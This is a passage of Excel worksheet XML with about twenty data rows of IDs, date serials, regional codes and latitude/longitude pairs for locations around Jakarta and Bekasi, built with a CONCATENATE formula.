      </c>
      <c r="N751">
        <v>3275061</v>
      </c>
      <c r="O751">
        <v>3275</v>
      </c>
      <c r="P751">
        <v>32</v>
      </c>
      <c r="Q751" t="s">
        <v>39</v>
      </c>
      <c r="R751" t="s">
        <v>40</v>
      </c>
      <c r="S751" t="s">
        <v>41</v>
      </c>
      <c r="T751" t="s">
        <v>42</v>
      </c>
      <c r="U751" s="5">
        <v>10697944</v>
      </c>
      <c r="V751" s="5" t="s">
        <v>15147</v>
      </c>
      <c r="W751" s="5">
        <v>-617457</v>
      </c>
      <c r="X751" t="s">
        <v>18475</v>
      </c>
      <c r="Y751" t="str">
        <f t="shared" si="11"/>
        <v>-6.17457,106.97944</v>
      </c>
    </row>
    <row r="752" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A752">
        <v>108293</v>
      </c>
      <c r="B752" s="1">
        <v>43883</v>
      </c>
      <c r="C752">
        <v>1</v>
      </c>
      <c r="D752" t="s">
        <v>22</v>
      </c>
      <c r="E752" t="s">
        <v>23</v>
      </c>
      <c r="F752" t="s">
        <v>3028</v>
      </c>
      <c r="H752" t="s">
        <v>26</v>
      </c>
      <c r="I752" t="s">
        <v>3029</v>
      </c>
      <c r="J752" t="s">
        <v>2627</v>
      </c>
      <c r="L752" t="s">
        <v>250</v>
      </c>
      <c r="M752">
        <v>3275061004</v>
      </c>
      <c r="N752">
        <v>3275061</v>
      </c>
      <c r="O752">
        <v>3275</v>
      </c>
      <c r="P752">
        <v>32</v>
      </c>
      <c r="Q752" t="s">
        <v>39</v>
      </c>
      <c r="R752" t="s">
        <v>40</v>
      </c>
      <c r="S752" t="s">
        <v>41</v>
      </c>
      <c r="T752" t="s">
        <v>42</v>
      </c>
      <c r="U752" s="5">
        <v>10698954</v>
      </c>
      <c r="V752" s="5" t="s">
        <v>15148</v>
      </c>
      <c r="W752" s="5">
        <v>-617763</v>
      </c>
      <c r="X752" t="s">
        <v>18948</v>
      </c>
      <c r="Y752" t="str">
        <f t="shared" si="11"/>
        <v>-6.17763,106.98954</v>
      </c>
    </row>
    <row r="753" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A753">
        <v>108307</v>
      </c>
      <c r="B753" s="1">
        <v>43883</v>
      </c>
      <c r="C753">
        <v>1</v>
      </c>
      <c r="D753" t="s">
        <v>22</v>
      </c>
      <c r="E753" t="s">
        <v>23</v>
      </c>
      <c r="F753" t="s">
        <v>3030</v>
      </c>
      <c r="G753" t="s">
        <v>3031</v>
      </c>
      <c r="H753" t="s">
        <v>26</v>
      </c>
      <c r="I753" t="s">
        <v>2005</v>
      </c>
      <c r="J753" t="s">
        <v>138</v>
      </c>
      <c r="L753" t="s">
        <v>3032</v>
      </c>
      <c r="M753">
        <v>3172080005</v>
      </c>
      <c r="N753">
        <v>3172080</v>
      </c>
      <c r="O753">
        <v>3172</v>
      </c>
      <c r="P753">
        <v>31</v>
      </c>
      <c r="Q753" t="s">
        <v>140</v>
      </c>
      <c r="R753" t="s">
        <v>141</v>
      </c>
      <c r="S753" t="s">
        <v>49</v>
      </c>
      <c r="T753" t="s">
        <v>33</v>
      </c>
      <c r="U753" s="5">
        <v>10695052</v>
      </c>
      <c r="V753" s="5" t="s">
        <v>15149</v>
      </c>
      <c r="W753" s="5">
        <v>-617522</v>
      </c>
      <c r="X753" t="s">
        <v>18434</v>
      </c>
      <c r="Y753" t="str">
        <f t="shared" si="11"/>
        <v>-6.17522,106.95052</v>
      </c>
    </row>
    <row r="754" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A754">
        <v>108314</v>
      </c>
      <c r="B754" s="1">
        <v>43883</v>
      </c>
      <c r="C754">
        <v>1</v>
      </c>
      <c r="D754" t="s">
        <v>22</v>
      </c>
      <c r="E754" t="s">
        <v>23</v>
      </c>
      <c r="F754" t="s">
        <v>3033</v>
      </c>
      <c r="G754" t="s">
        <v>3034</v>
      </c>
      <c r="H754" t="s">
        <v>26</v>
      </c>
      <c r="I754" t="s">
        <v>542</v>
      </c>
      <c r="J754" t="s">
        <v>3035</v>
      </c>
      <c r="L754" t="s">
        <v>3036</v>
      </c>
      <c r="M754">
        <v>3171100007</v>
      </c>
      <c r="N754">
        <v>3171100</v>
      </c>
      <c r="O754">
        <v>3171</v>
      </c>
      <c r="P754">
        <v>31</v>
      </c>
      <c r="Q754" t="s">
        <v>1427</v>
      </c>
      <c r="R754" t="s">
        <v>107</v>
      </c>
      <c r="S754" t="s">
        <v>108</v>
      </c>
      <c r="T754" t="s">
        <v>33</v>
      </c>
      <c r="U754" s="5">
        <v>10683225</v>
      </c>
      <c r="V754" s="5" t="s">
        <v>14986</v>
      </c>
      <c r="W754" s="5">
        <v>-620659</v>
      </c>
      <c r="X754" t="s">
        <v>18949</v>
      </c>
      <c r="Y754" t="str">
        <f t="shared" si="11"/>
        <v>-6.20659,106.83225</v>
      </c>
    </row>
    <row r="755" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A755">
        <v>108325</v>
      </c>
      <c r="B755" s="1">
        <v>43883</v>
      </c>
      <c r="C755">
        <v>1</v>
      </c>
      <c r="D755" t="s">
        <v>22</v>
      </c>
      <c r="E755" t="s">
        <v>23</v>
      </c>
      <c r="F755" t="s">
        <v>3037</v>
      </c>
      <c r="G755" t="s">
        <v>3038</v>
      </c>
      <c r="H755" t="s">
        <v>26</v>
      </c>
      <c r="I755" t="s">
        <v>1359</v>
      </c>
      <c r="J755" t="s">
        <v>2573</v>
      </c>
      <c r="L755" t="s">
        <v>3039</v>
      </c>
      <c r="M755">
        <v>3175050003</v>
      </c>
      <c r="N755">
        <v>3175050</v>
      </c>
      <c r="O755">
        <v>3175</v>
      </c>
      <c r="P755">
        <v>31</v>
      </c>
      <c r="Q755" t="s">
        <v>1740</v>
      </c>
      <c r="R755" t="s">
        <v>1013</v>
      </c>
      <c r="S755" t="s">
        <v>547</v>
      </c>
      <c r="T755" t="s">
        <v>33</v>
      </c>
      <c r="U755" s="5">
        <v>10692134</v>
      </c>
      <c r="V755" s="5" t="s">
        <v>15150</v>
      </c>
      <c r="W755" s="5">
        <v>-616187</v>
      </c>
      <c r="X755" t="s">
        <v>18950</v>
      </c>
      <c r="Y755" t="str">
        <f t="shared" si="11"/>
        <v>-6.16187,106.92134</v>
      </c>
    </row>
    <row r="756" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A756">
        <v>108326</v>
      </c>
      <c r="B756" s="1">
        <v>43883</v>
      </c>
      <c r="C756">
        <v>1</v>
      </c>
      <c r="D756" t="s">
        <v>22</v>
      </c>
      <c r="E756" t="s">
        <v>23</v>
      </c>
      <c r="F756" t="s">
        <v>3040</v>
      </c>
      <c r="G756" t="s">
        <v>3041</v>
      </c>
      <c r="H756" t="s">
        <v>26</v>
      </c>
      <c r="I756" t="s">
        <v>3042</v>
      </c>
      <c r="J756" t="s">
        <v>2627</v>
      </c>
      <c r="L756" t="s">
        <v>3043</v>
      </c>
      <c r="M756">
        <v>3275061004</v>
      </c>
      <c r="N756">
        <v>3275061</v>
      </c>
      <c r="O756">
        <v>3275</v>
      </c>
      <c r="P756">
        <v>32</v>
      </c>
      <c r="Q756" t="s">
        <v>39</v>
      </c>
      <c r="R756" t="s">
        <v>40</v>
      </c>
      <c r="S756" t="s">
        <v>41</v>
      </c>
      <c r="T756" t="s">
        <v>42</v>
      </c>
      <c r="U756" s="5">
        <v>10698771</v>
      </c>
      <c r="V756" s="5" t="s">
        <v>15151</v>
      </c>
      <c r="W756" s="5">
        <v>-617933</v>
      </c>
      <c r="X756" t="s">
        <v>18951</v>
      </c>
      <c r="Y756" t="str">
        <f t="shared" si="11"/>
        <v>-6.17933,106.98771</v>
      </c>
    </row>
    <row r="757" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A757">
        <v>108327</v>
      </c>
      <c r="B757" s="1">
        <v>43883</v>
      </c>
      <c r="C757">
        <v>1</v>
      </c>
      <c r="D757" t="s">
        <v>22</v>
      </c>
      <c r="E757" t="s">
        <v>23</v>
      </c>
      <c r="F757" t="s">
        <v>3044</v>
      </c>
      <c r="H757" t="s">
        <v>26</v>
      </c>
      <c r="I757" t="s">
        <v>3029</v>
      </c>
      <c r="J757" t="s">
        <v>3045</v>
      </c>
      <c r="L757" t="s">
        <v>3046</v>
      </c>
      <c r="M757">
        <v>3175060002</v>
      </c>
      <c r="N757">
        <v>3175060</v>
      </c>
      <c r="O757">
        <v>3175</v>
      </c>
      <c r="P757">
        <v>31</v>
      </c>
      <c r="Q757" t="s">
        <v>2674</v>
      </c>
      <c r="R757" t="s">
        <v>2279</v>
      </c>
      <c r="S757" t="s">
        <v>547</v>
      </c>
      <c r="T757" t="s">
        <v>33</v>
      </c>
      <c r="U757" s="5">
        <v>10695653</v>
      </c>
      <c r="V757" s="5" t="s">
        <v>15152</v>
      </c>
      <c r="W757" s="5">
        <v>-613997</v>
      </c>
      <c r="X757" t="s">
        <v>18952</v>
      </c>
      <c r="Y757" t="str">
        <f t="shared" si="11"/>
        <v>-6.13997,106.95653</v>
      </c>
    </row>
    <row r="758" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A758">
        <v>108328</v>
      </c>
      <c r="B758" s="1">
        <v>43883</v>
      </c>
      <c r="C758">
        <v>1</v>
      </c>
      <c r="D758" t="s">
        <v>22</v>
      </c>
      <c r="E758" t="s">
        <v>23</v>
      </c>
      <c r="F758" t="s">
        <v>3047</v>
      </c>
      <c r="G758" t="s">
        <v>3048</v>
      </c>
      <c r="H758" t="s">
        <v>26</v>
      </c>
      <c r="I758" t="s">
        <v>80</v>
      </c>
      <c r="J758" t="s">
        <v>3049</v>
      </c>
      <c r="L758" t="s">
        <v>3050</v>
      </c>
      <c r="M758">
        <v>3175060002</v>
      </c>
      <c r="N758">
        <v>3175060</v>
      </c>
      <c r="O758">
        <v>3175</v>
      </c>
      <c r="P758">
        <v>31</v>
      </c>
      <c r="Q758" t="s">
        <v>2674</v>
      </c>
      <c r="R758" t="s">
        <v>2279</v>
      </c>
      <c r="S758" t="s">
        <v>547</v>
      </c>
      <c r="T758" t="s">
        <v>33</v>
      </c>
      <c r="U758" s="5">
        <v>10694975</v>
      </c>
      <c r="V758" s="5" t="s">
        <v>15153</v>
      </c>
      <c r="W758" s="5">
        <v>-615264</v>
      </c>
      <c r="X758" t="s">
        <v>18953</v>
      </c>
      <c r="Y758" t="str">
        <f t="shared" si="11"/>
        <v>-6.15264,106.94975</v>
      </c>
    </row>
    <row r="759" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A759">
        <v>108329</v>
      </c>
      <c r="B759" s="1">
        <v>43883</v>
      </c>
      <c r="C759">
        <v>1</v>
      </c>
      <c r="D759" t="s">
        <v>22</v>
      </c>
      <c r="E759" t="s">
        <v>23</v>
      </c>
      <c r="F759" t="s">
        <v>3051</v>
      </c>
      <c r="G759" t="s">
        <v>3052</v>
      </c>
      <c r="H759" t="s">
        <v>26</v>
      </c>
      <c r="I759" t="s">
        <v>1046</v>
      </c>
      <c r="J759" t="s">
        <v>3053</v>
      </c>
      <c r="M759">
        <v>3173040002</v>
      </c>
      <c r="N759">
        <v>3173040</v>
      </c>
      <c r="O759">
        <v>3173</v>
      </c>
      <c r="P759">
        <v>31</v>
      </c>
      <c r="Q759" t="s">
        <v>3054</v>
      </c>
      <c r="R759" t="s">
        <v>1598</v>
      </c>
      <c r="S759" t="s">
        <v>62</v>
      </c>
      <c r="T759" t="s">
        <v>33</v>
      </c>
      <c r="U759" s="5">
        <v>10685447</v>
      </c>
      <c r="V759" s="5" t="s">
        <v>15154</v>
      </c>
      <c r="W759" s="5">
        <v>-617960</v>
      </c>
      <c r="X759" t="s">
        <v>18341</v>
      </c>
      <c r="Y759" t="str">
        <f t="shared" si="11"/>
        <v>-6.17960,106.85447</v>
      </c>
    </row>
    <row r="760" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A760">
        <v>108330</v>
      </c>
      <c r="B760" s="1">
        <v>43883</v>
      </c>
      <c r="C760">
        <v>1</v>
      </c>
      <c r="D760" t="s">
        <v>22</v>
      </c>
      <c r="E760" t="s">
        <v>23</v>
      </c>
      <c r="F760" t="s">
        <v>3055</v>
      </c>
      <c r="G760" t="s">
        <v>3056</v>
      </c>
      <c r="H760" t="s">
        <v>26</v>
      </c>
      <c r="I760" t="s">
        <v>666</v>
      </c>
      <c r="J760" t="s">
        <v>3057</v>
      </c>
      <c r="M760">
        <v>3175060001</v>
      </c>
      <c r="N760">
        <v>3175060</v>
      </c>
      <c r="O760">
        <v>3175</v>
      </c>
      <c r="P760">
        <v>31</v>
      </c>
      <c r="Q760" t="s">
        <v>2278</v>
      </c>
      <c r="R760" t="s">
        <v>2279</v>
      </c>
      <c r="S760" t="s">
        <v>547</v>
      </c>
      <c r="T760" t="s">
        <v>33</v>
      </c>
      <c r="U760" s="5">
        <v>10692728</v>
      </c>
      <c r="V760" s="5" t="s">
        <v>15155</v>
      </c>
      <c r="W760" s="5">
        <v>-614710</v>
      </c>
      <c r="X760" t="s">
        <v>18954</v>
      </c>
      <c r="Y760" t="str">
        <f t="shared" si="11"/>
        <v>-6.14710,106.92728</v>
      </c>
    </row>
    <row r="761" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A761">
        <v>108331</v>
      </c>
      <c r="B761" s="1">
        <v>43883</v>
      </c>
      <c r="C761">
        <v>1</v>
      </c>
      <c r="D761" t="s">
        <v>22</v>
      </c>
      <c r="E761" t="s">
        <v>23</v>
      </c>
      <c r="F761" t="s">
        <v>3058</v>
      </c>
      <c r="G761" t="s">
        <v>3059</v>
      </c>
      <c r="H761" t="s">
        <v>26</v>
      </c>
      <c r="I761" t="s">
        <v>166</v>
      </c>
      <c r="J761" t="s">
        <v>2627</v>
      </c>
      <c r="L761" t="s">
        <v>3060</v>
      </c>
      <c r="M761">
        <v>3216100001</v>
      </c>
      <c r="N761">
        <v>3216100</v>
      </c>
      <c r="O761">
        <v>3216</v>
      </c>
      <c r="P761">
        <v>32</v>
      </c>
      <c r="Q761" t="s">
        <v>2459</v>
      </c>
      <c r="R761" t="s">
        <v>940</v>
      </c>
      <c r="S761" t="s">
        <v>41</v>
      </c>
      <c r="T761" t="s">
        <v>42</v>
      </c>
      <c r="U761" s="5">
        <v>10698729</v>
      </c>
      <c r="V761" s="5" t="s">
        <v>15156</v>
      </c>
      <c r="W761" s="5">
        <v>-615255</v>
      </c>
      <c r="X761" t="s">
        <v>18955</v>
      </c>
      <c r="Y761" t="str">
        <f t="shared" si="11"/>
        <v>-6.15255,106.98729</v>
      </c>
    </row>
    <row r="762" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A762">
        <v>108332</v>
      </c>
      <c r="B762" s="1">
        <v>43883</v>
      </c>
      <c r="C762">
        <v>1</v>
      </c>
      <c r="D762" t="s">
        <v>22</v>
      </c>
      <c r="E762" t="s">
        <v>23</v>
      </c>
      <c r="F762" t="s">
        <v>3061</v>
      </c>
      <c r="H762" t="s">
        <v>26</v>
      </c>
      <c r="I762" t="s">
        <v>3062</v>
      </c>
      <c r="J762" t="s">
        <v>2627</v>
      </c>
      <c r="L762" t="s">
        <v>3063</v>
      </c>
      <c r="M762">
        <v>3216100001</v>
      </c>
      <c r="N762">
        <v>3216100</v>
      </c>
      <c r="O762">
        <v>3216</v>
      </c>
      <c r="P762">
        <v>32</v>
      </c>
      <c r="Q762" t="s">
        <v>2459</v>
      </c>
      <c r="R762" t="s">
        <v>940</v>
      </c>
      <c r="S762" t="s">
        <v>41</v>
      </c>
      <c r="T762" t="s">
        <v>42</v>
      </c>
      <c r="U762" s="5">
        <v>10697881</v>
      </c>
      <c r="V762" s="5" t="s">
        <v>15157</v>
      </c>
      <c r="W762" s="5">
        <v>-617079</v>
      </c>
      <c r="X762" t="s">
        <v>18956</v>
      </c>
      <c r="Y762" t="str">
        <f t="shared" si="11"/>
        <v>-6.17079,106.97881</v>
      </c>
    </row>
    <row r="763" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A763">
        <v>108333</v>
      </c>
      <c r="B763" s="1">
        <v>43883</v>
      </c>
      <c r="C763">
        <v>1</v>
      </c>
      <c r="D763" t="s">
        <v>22</v>
      </c>
      <c r="E763" t="s">
        <v>23</v>
      </c>
      <c r="F763" t="s">
        <v>3064</v>
      </c>
      <c r="G763" t="s">
        <v>3065</v>
      </c>
      <c r="H763" t="s">
        <v>26</v>
      </c>
      <c r="I763" t="s">
        <v>1604</v>
      </c>
      <c r="J763" t="s">
        <v>3066</v>
      </c>
      <c r="L763" t="s">
        <v>3067</v>
      </c>
      <c r="M763">
        <v>3173020001</v>
      </c>
      <c r="N763">
        <v>3173020</v>
      </c>
      <c r="O763">
        <v>3173</v>
      </c>
      <c r="P763">
        <v>31</v>
      </c>
      <c r="Q763" t="s">
        <v>179</v>
      </c>
      <c r="R763" t="s">
        <v>179</v>
      </c>
      <c r="S763" t="s">
        <v>62</v>
      </c>
      <c r="T763" t="s">
        <v>33</v>
      </c>
      <c r="U763" s="5">
        <v>10683380</v>
      </c>
      <c r="V763" s="5" t="s">
        <v>15158</v>
      </c>
      <c r="W763" s="5">
        <v>-619926</v>
      </c>
      <c r="X763" t="s">
        <v>18957</v>
      </c>
      <c r="Y763" t="str">
        <f t="shared" si="11"/>
        <v>-6.19926,106.83380</v>
      </c>
    </row>
    <row r="764" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A764">
        <v>108334</v>
      </c>
      <c r="B764" s="1">
        <v>43883</v>
      </c>
      <c r="C764">
        <v>1</v>
      </c>
      <c r="D764" t="s">
        <v>22</v>
      </c>
      <c r="E764" t="s">
        <v>23</v>
      </c>
      <c r="F764" t="s">
        <v>3068</v>
      </c>
      <c r="H764" t="s">
        <v>26</v>
      </c>
      <c r="I764" t="s">
        <v>3069</v>
      </c>
      <c r="J764" t="s">
        <v>2590</v>
      </c>
      <c r="L764" t="s">
        <v>3070</v>
      </c>
      <c r="M764">
        <v>3173020002</v>
      </c>
      <c r="N764">
        <v>3173020</v>
      </c>
      <c r="O764">
        <v>3173</v>
      </c>
      <c r="P764">
        <v>31</v>
      </c>
      <c r="Q764" t="s">
        <v>2592</v>
      </c>
      <c r="R764" t="s">
        <v>179</v>
      </c>
      <c r="S764" t="s">
        <v>62</v>
      </c>
      <c r="T764" t="s">
        <v>33</v>
      </c>
      <c r="U764" s="5">
        <v>10684989</v>
      </c>
      <c r="V764" s="5" t="s">
        <v>15159</v>
      </c>
      <c r="W764" s="5">
        <v>-620146</v>
      </c>
      <c r="X764" t="s">
        <v>18958</v>
      </c>
      <c r="Y764" t="str">
        <f t="shared" si="11"/>
        <v>-6.20146,106.84989</v>
      </c>
    </row>
    <row r="765" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A765">
        <v>108335</v>
      </c>
      <c r="B765" s="1">
        <v>43883</v>
      </c>
      <c r="C765">
        <v>1</v>
      </c>
      <c r="D765" t="s">
        <v>22</v>
      </c>
      <c r="E765" t="s">
        <v>23</v>
      </c>
      <c r="F765" t="s">
        <v>3071</v>
      </c>
      <c r="H765" t="s">
        <v>26</v>
      </c>
      <c r="I765" t="s">
        <v>1633</v>
      </c>
      <c r="J765" t="s">
        <v>3072</v>
      </c>
      <c r="L765" t="s">
        <v>3073</v>
      </c>
      <c r="M765">
        <v>3172080003</v>
      </c>
      <c r="N765">
        <v>3172080</v>
      </c>
      <c r="O765">
        <v>3172</v>
      </c>
      <c r="P765">
        <v>31</v>
      </c>
      <c r="Q765" t="s">
        <v>2250</v>
      </c>
      <c r="R765" t="s">
        <v>141</v>
      </c>
      <c r="S765" t="s">
        <v>49</v>
      </c>
      <c r="T765" t="s">
        <v>33</v>
      </c>
      <c r="U765" s="5">
        <v>10695075</v>
      </c>
      <c r="V765" s="5" t="s">
        <v>15160</v>
      </c>
      <c r="W765" s="5">
        <v>-619790</v>
      </c>
      <c r="X765" t="s">
        <v>18959</v>
      </c>
      <c r="Y765" t="str">
        <f t="shared" si="11"/>
        <v>-6.19790,106.95075</v>
      </c>
    </row>
    <row r="766" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A766">
        <v>108336</v>
      </c>
      <c r="B766" s="1">
        <v>43883</v>
      </c>
      <c r="C766">
        <v>1</v>
      </c>
      <c r="D766" t="s">
        <v>22</v>
      </c>
      <c r="E766" t="s">
        <v>23</v>
      </c>
      <c r="F766" t="s">
        <v>3074</v>
      </c>
      <c r="H766" t="s">
        <v>26</v>
      </c>
      <c r="I766" t="s">
        <v>628</v>
      </c>
      <c r="J766" t="s">
        <v>2627</v>
      </c>
      <c r="L766" t="s">
        <v>3075</v>
      </c>
      <c r="M766">
        <v>3275061004</v>
      </c>
      <c r="N766">
        <v>3275061</v>
      </c>
      <c r="O766">
        <v>3275</v>
      </c>
      <c r="P766">
        <v>32</v>
      </c>
      <c r="Q766" t="s">
        <v>39</v>
      </c>
      <c r="R766" t="s">
        <v>40</v>
      </c>
      <c r="S766" t="s">
        <v>41</v>
      </c>
      <c r="T766" t="s">
        <v>42</v>
      </c>
      <c r="U766" s="5">
        <v>10698828</v>
      </c>
      <c r="V766" s="5" t="s">
        <v>15161</v>
      </c>
      <c r="W766" s="5">
        <v>-617567</v>
      </c>
      <c r="X766" t="s">
        <v>18960</v>
      </c>
      <c r="Y766" t="str">
        <f t="shared" si="11"/>
        <v>-6.17567,106.98828</v>
      </c>
    </row>
    <row r="767" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A767">
        <v>108337</v>
      </c>
      <c r="B767" s="1">
        <v>43883</v>
      </c>
      <c r="C767">
        <v>1</v>
      </c>
      <c r="D767" t="s">
        <v>22</v>
      </c>
      <c r="E767" t="s">
        <v>23</v>
      </c>
      <c r="F767" t="s">
        <v>3076</v>
      </c>
      <c r="H767" t="s">
        <v>26</v>
      </c>
      <c r="I767" t="s">
        <v>166</v>
      </c>
      <c r="J767" t="s">
        <v>3077</v>
      </c>
      <c r="L767" t="s">
        <v>3078</v>
      </c>
      <c r="M767">
        <v>3172040005</v>
      </c>
      <c r="N767">
        <v>3172040</v>
      </c>
      <c r="O767">
        <v>3172</v>
      </c>
      <c r="P767">
        <v>31</v>
      </c>
      <c r="Q767" t="s">
        <v>1351</v>
      </c>
      <c r="R767" t="s">
        <v>281</v>
      </c>
      <c r="S767" t="s">
        <v>49</v>
      </c>
      <c r="T767" t="s">
        <v>33</v>
      </c>
      <c r="U767" s="5">
        <v>10690690</v>
      </c>
      <c r="V767" s="5" t="s">
        <v>15162</v>
      </c>
      <c r="W767" s="5">
        <v>-625704</v>
      </c>
      <c r="X767" t="s">
        <v>18961</v>
      </c>
      <c r="Y767" t="str">
        <f t="shared" si="11"/>
        <v>-6.25704,106.90690</v>
      </c>
    </row>
    <row r="768" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A768">
        <v>108338</v>
      </c>
      <c r="B768" s="1">
        <v>43883</v>
      </c>
      <c r="C768">
        <v>1</v>
      </c>
      <c r="D768" t="s">
        <v>22</v>
      </c>
      <c r="E768" t="s">
        <v>23</v>
      </c>
      <c r="F768" t="s">
        <v>3079</v>
      </c>
      <c r="H768" t="s">
        <v>26</v>
      </c>
      <c r="I768" t="s">
        <v>27</v>
      </c>
      <c r="J768" t="s">
        <v>3072</v>
      </c>
      <c r="L768" t="s">
        <v>3080</v>
      </c>
      <c r="M768">
        <v>3172080003</v>
      </c>
      <c r="N768">
        <v>3172080</v>
      </c>
      <c r="O768">
        <v>3172</v>
      </c>
      <c r="P768">
        <v>31</v>
      </c>
      <c r="Q768" t="s">
        <v>2250</v>
      </c>
      <c r="R768" t="s">
        <v>141</v>
      </c>
      <c r="S768" t="s">
        <v>49</v>
      </c>
      <c r="T768" t="s">
        <v>33</v>
      </c>
      <c r="U768" s="5">
        <v>10695065</v>
      </c>
      <c r="V768" s="5" t="s">
        <v>15163</v>
      </c>
      <c r="W768" s="5">
        <v>-619795</v>
      </c>
      <c r="X768" t="s">
        <v>18962</v>
      </c>
      <c r="Y768" t="str">
        <f t="shared" si="11"/>
        <v>-6.19795,106.95065</v>
      </c>
    </row>
    <row r="769" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A769">
        <v>108339</v>
      </c>
      <c r="B769" s="1">
        <v>43883</v>
      </c>
      <c r="C769">
        <v>1</v>
      </c>
      <c r="D769" t="s">
        <v>22</v>
      </c>
      <c r="E769" t="s">
        <v>23</v>
      </c>
      <c r="F769" t="s">
        <v>3081</v>
      </c>
      <c r="H769" t="s">
        <v>26</v>
      </c>
      <c r="I769" t="s">
        <v>166</v>
      </c>
      <c r="J769" t="s">
        <v>3082</v>
      </c>
      <c r="L769" t="s">
        <v>3083</v>
      </c>
      <c r="M769">
        <v>3172080004</v>
      </c>
      <c r="N769">
        <v>3172080</v>
      </c>
      <c r="O769">
        <v>3172</v>
      </c>
      <c r="P769">
        <v>31</v>
      </c>
      <c r="Q769" t="s">
        <v>3084</v>
      </c>
      <c r="R769" t="s">
        <v>141</v>
      </c>
      <c r="S769" t="s">
        <v>49</v>
      </c>
      <c r="T769" t="s">
        <v>33</v>
      </c>
      <c r="U769" s="5">
        <v>10696272</v>
      </c>
      <c r="V769" s="5" t="s">
        <v>15164</v>
      </c>
      <c r="W769" s="5">
        <v>-618585</v>
      </c>
      <c r="X769" t="s">
        <v>18963</v>
      </c>
      <c r="Y769" t="str">
        <f t="shared" si="11"/>
        <v>-6.18585,106.96272</v>
      </c>
    </row>
    <row r="770" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A770">
        <v>108340</v>
      </c>
      <c r="B770" s="1">
        <v>43883</v>
      </c>
      <c r="C770">
        <v>1</v>
      </c>
      <c r="D770" t="s">
        <v>22</v>
      </c>
      <c r="E770" t="s">
        <v>23</v>
      </c>
      <c r="F770" t="s">
        <v>3085</v>
      </c>
      <c r="G770" t="s">
        <v>3086</v>
      </c>
      <c r="H770" t="s">
        <v>26</v>
      </c>
      <c r="I770" t="s">
        <v>2962</v>
      </c>
      <c r="J770" t="s">
        <v>2919</v>
      </c>
      <c r="L770" t="s">
        <v>3087</v>
      </c>
      <c r="M770">
        <v>3172090004</v>
      </c>
      <c r="N770">
        <v>3172090</v>
      </c>
      <c r="O770">
        <v>3172</v>
      </c>
      <c r="P770">
        <v>31</v>
      </c>
      <c r="Q770" t="s">
        <v>889</v>
      </c>
      <c r="R770" t="s">
        <v>890</v>
      </c>
      <c r="S770" t="s">
        <v>49</v>
      </c>
      <c r="T770" t="s">
        <v>33</v>
      </c>
      <c r="U770" s="5">
        <v>10689614</v>
      </c>
      <c r="V770" s="5" t="s">
        <v>15165</v>
      </c>
      <c r="W770" s="5">
        <v>-619855</v>
      </c>
      <c r="X770" t="s">
        <v>18964</v>
      </c>
      <c r="Y770" t="str">
        <f t="shared" si="11"/>
        <v>-6.19855,106.89614</v>
      </c>
    </row>
    <row r="771" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A771">
        <v>108341</v>
      </c>
      <c r="B771" s="1">
        <v>43883</v>
      </c>
      <c r="C771">
        <v>1</v>
      </c>
      <c r="D771" t="s">
        <v>22</v>
      </c>
      <c r="E771" t="s">
        <v>23</v>
      </c>
      <c r="F771" t="s">
        <v>3088</v>
      </c>
      <c r="G771" t="s">
        <v>3089</v>
      </c>
      <c r="H771" t="s">
        <v>26</v>
      </c>
      <c r="I771" t="s">
        <v>974</v>
      </c>
      <c r="J771" t="s">
        <v>3090</v>
      </c>
      <c r="L771" t="s">
        <v>3091</v>
      </c>
      <c r="M771">
        <v>3173040004</v>
      </c>
      <c r="N771">
        <v>3173040</v>
      </c>
      <c r="O771">
        <v>3173</v>
      </c>
      <c r="P771">
        <v>31</v>
      </c>
      <c r="Q771" t="s">
        <v>3092</v>
      </c>
      <c r="R771" t="s">
        <v>1598</v>
      </c>
      <c r="S771" t="s">
        <v>62</v>
      </c>
      <c r="T771" t="s">
        <v>33</v>
      </c>
      <c r="U771" s="5">
        <v>10685548</v>
      </c>
      <c r="V771" s="5" t="s">
        <v>15166</v>
      </c>
      <c r="W771" s="5">
        <v>-617812</v>
      </c>
      <c r="X771" t="s">
        <v>18965</v>
      </c>
      <c r="Y771" t="str">
        <f t="shared" ref="Y771:Y834" si="12">CONCATENATE(X771,",",V771)</f>
        <v>-6.17812,106.85548</v>
      </c>
    </row>
    <row r="772" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A772">
        <v>108342</v>
      </c>
      <c r="B772" s="1">
        <v>43883</v>
      </c>
      <c r="C772">
        <v>1</v>
      </c>
      <c r="D772" t="s">
        <v>22</v>
      </c>
      <c r="E772" t="s">
        <v>23</v>
      </c>
      <c r="F772" t="s">
        <v>3093</v>
      </c>
      <c r="G772" t="s">
        <v>3094</v>
      </c>
      <c r="H772" t="s">
        <v>26</v>
      </c>
      <c r="I772" t="s">
        <v>3095</v>
      </c>
      <c r="J772" t="s">
        <v>1628</v>
      </c>
      <c r="L772" t="s">
        <v>3096</v>
      </c>
      <c r="M772">
        <v>3171100005</v>
      </c>
      <c r="N772">
        <v>3171100</v>
      </c>
      <c r="O772">
        <v>3171</v>
      </c>
      <c r="P772">
        <v>31</v>
      </c>
      <c r="Q772" t="s">
        <v>1630</v>
      </c>
      <c r="R772" t="s">
        <v>107</v>
      </c>
      <c r="S772" t="s">
        <v>108</v>
      </c>
      <c r="T772" t="s">
        <v>33</v>
      </c>
      <c r="U772" s="5">
        <v>10684421</v>
      </c>
      <c r="V772" s="5" t="s">
        <v>15167</v>
      </c>
      <c r="W772" s="5">
        <v>-621936</v>
      </c>
      <c r="X772" t="s">
        <v>18966</v>
      </c>
      <c r="Y772" t="str">
        <f t="shared" si="12"/>
        <v>-6.21936,106.84421</v>
      </c>
    </row>
    <row r="773" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A773">
